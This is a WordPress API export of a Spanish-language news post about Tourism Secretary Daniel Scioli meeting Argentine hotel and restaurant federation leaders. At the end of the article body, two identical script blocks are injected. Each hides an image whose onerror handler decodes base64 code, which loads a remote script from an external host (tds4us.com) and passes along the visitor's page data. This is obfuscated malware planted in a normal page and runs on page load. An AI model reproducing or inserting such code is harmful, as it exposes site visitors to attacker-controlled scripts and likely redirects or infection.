{"id":5282,"date":"2025-06-26T11:32:15","date_gmt":"2025-06-26T14:32:15","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5282"},"modified":"2025-08-13T23:28:51","modified_gmt":"2025-08-14T02:28:51","slug":"scioli-se-reunio-con-representantes-hoteleros-y-gastronomicos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5282","title":{"rendered":"Scioli se reuni\u00f3 con representantes hoteleros y gastron\u00f3micos"},"content":{"rendered":"\n<p><strong><em>Con el fin de analizar los principales temas estrat\u00e9gicos que impactan en la competitividad del desarrollo del sector.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,\u00a0<strong>Daniel Scioli<\/strong>, se reuni\u00f3 con empresarios hoteleros y gastron\u00f3micos en la\u00a0<strong>Federaci\u00f3n Empresaria Hotelera Gastron\u00f3mica de la Rep\u00fablica Argentina<\/strong>\u00a0(FEHGRA), en el marco de un encuentro con el\u00a0<strong>Comit\u00e9 Ejecutivo<\/strong>\u00a0y presidentes de sus entidades asociadas, para analizar los principales temas estrat\u00e9gicos que impactan en el desarrollo del sector.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/auditorio_fehgra.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Scioli<\/strong>, quien particip\u00f3 del di\u00e1logo con los referentes de la Federaci\u00f3n, destac\u00f3 la importancia del trabajo conjunto con el sector privado para potenciar la actividad tur\u00edstica y gastron\u00f3mica en cada rinc\u00f3n del pa\u00eds.<\/p>\n\n\n\n<p>El secretario se comprometi\u00f3 a realizar las gestiones necesarias para seguir avanzando en la competitividad del sector.&nbsp;<em>\u00abNuestra prioridad es marcar los par\u00e1metros para generar que los privados sean competitivos y puedan seguir invirtiendo en nuestro pa\u00eds\u201d<\/em>, finaliz\u00f3&nbsp;<strong>Scioli<\/strong>.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes el presidente y el vicepresidente de FEHGRA,&nbsp;<strong>Fernando Desbots<\/strong>&nbsp;y&nbsp;<strong>Rafael Miranda<\/strong>; la presidenta de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Laura Teruel<\/strong>; y presidentes de entidades asociadas a FEHGRA de todo el pa\u00eds.<\/p>\n\n\n\n<p>En ese contexto,&nbsp;<strong>Desbots<\/strong>&nbsp;destac\u00f3 que est\u00e1n&nbsp;<em>\u201ctrabajando conjuntamente los sectores p\u00fablico y privado\u201d<\/em>&nbsp;y remarc\u00f3 el compromiso de Scioli para avanzar en temas centrales para la competitividad de la actividad tur\u00edstica.<\/p>\n\n\n\n<p><em>\u201cEstos espacios de encuentro son fundamentales para construir consensos y pol\u00edticas sostenibles. Cada regi\u00f3n, cada provincia, cada ciudad tiene desaf\u00edos propios. Sin embargo, todos compartimos una misma vocaci\u00f3n: trabajar, invertir y crecer\u201d<\/em>, concluy\u00f3.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con el fin de analizar los principales temas estrat\u00e9gicos que impactan en la competitividad del desarrollo del sector. El secretario de Turismo, Ambiente y Deportes,\u00a0Daniel Scioli, se reuni\u00f3 con empresarios hoteleros y gastron\u00f3micos en la\u00a0Federaci\u00f3n Empresaria Hotelera Gastron\u00f3mica de la Rep\u00fablica Argentina\u00a0(FEHGRA), en el marco de un encuentro con el\u00a0Comit\u00e9 Ejecutivo\u00a0y presidentes de sus entidades [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5283,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20],"tags":[],"class_list":{"0":"post-5282","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5282"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5282"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5282\/revisions"}],"predecessor-version":[{"id":6454,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5282\/revisions\/6454"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5283"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5282"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5282"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5282"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}